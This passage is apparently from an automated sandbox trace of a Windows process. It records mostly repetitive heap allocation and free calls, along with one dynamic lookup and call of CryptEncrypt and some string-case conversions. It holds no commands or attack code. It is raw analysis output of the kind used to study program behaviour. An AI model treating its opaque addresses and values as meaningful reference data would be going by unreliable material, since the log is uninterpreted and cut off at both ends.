hHeap=0x25c0000) returned 1 [0188.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0188.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0188.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0188.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0188.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0188.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0188.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0188.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0188.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0188.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0188.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0188.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0188.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24e8210 | out: hHeap=0x25c0000) returned 1 [0188.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0188.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0188.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0188.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0188.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0188.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.757] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0188.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0188.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0188.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0188.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0188.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0188.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0188.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0188.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0188.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0188.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0188.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0188.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0188.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0188.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0188.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0188.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0188.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0188.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0188.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0188.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0188.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0188.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x34aa4f0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0188.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0188.759] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0188.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0188.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1c) returned 0x24b3cb8 [0188.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0188.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00c0 [0188.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0188.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0150 [0188.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0160 [0188.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0188.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0188.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0188.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0150 | out: hHeap=0x25c0000) returned 1 [0188.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0160 | out: hHeap=0x25c0000) returned 1 [0188.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0188.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0188.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0188.760] CryptEncrypt (in: hKey=0xaa58a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0xad35, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0xad38) returned 1 [0188.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0188.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0188.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0188.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0188.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0188.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0188.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0188.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0188.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0188.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0188.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0188.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0188.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0188.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0188.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0188.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0188.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0188.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0188.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0188.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0188.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0188.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0188.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0188.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0188.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0188.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0188.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0188.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0188.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0188.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0188.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0188.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0188.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0188.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0188.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0188.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0188.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0188.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0188.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0188.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0188.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0188.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0188.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0188.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0188.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0188.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0188.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0188.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0188.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0188.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0188.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0188.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0188.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0188.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0188.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0188.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0188.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0188.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0188.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0188.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0188.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0188.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0188.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0188.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0188.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0188.764] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0188.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0188.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0188.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0188.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0188.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0188.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0188.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0188.764] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.765] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0188.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0188.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0188.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0188.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0188.765] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0188.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0188.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0188.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0188.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0188.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0188.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0188.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0188.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0110 [0188.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0188.765] CharLowerBuffW (in: lpsz="byte[44344]", cchLength=0xb | out: lpsz="byte[44344]") returned 0xb [0188.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0188.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0188.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0188.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0188.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0188.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0188.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0100 [0188.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0188.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0188.766] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0188.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0188.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0188.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0188.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0188.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0188.767] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0188.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0188.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0188.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0188.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0188.767] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0188.767] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.767] RtlAllocateHeap 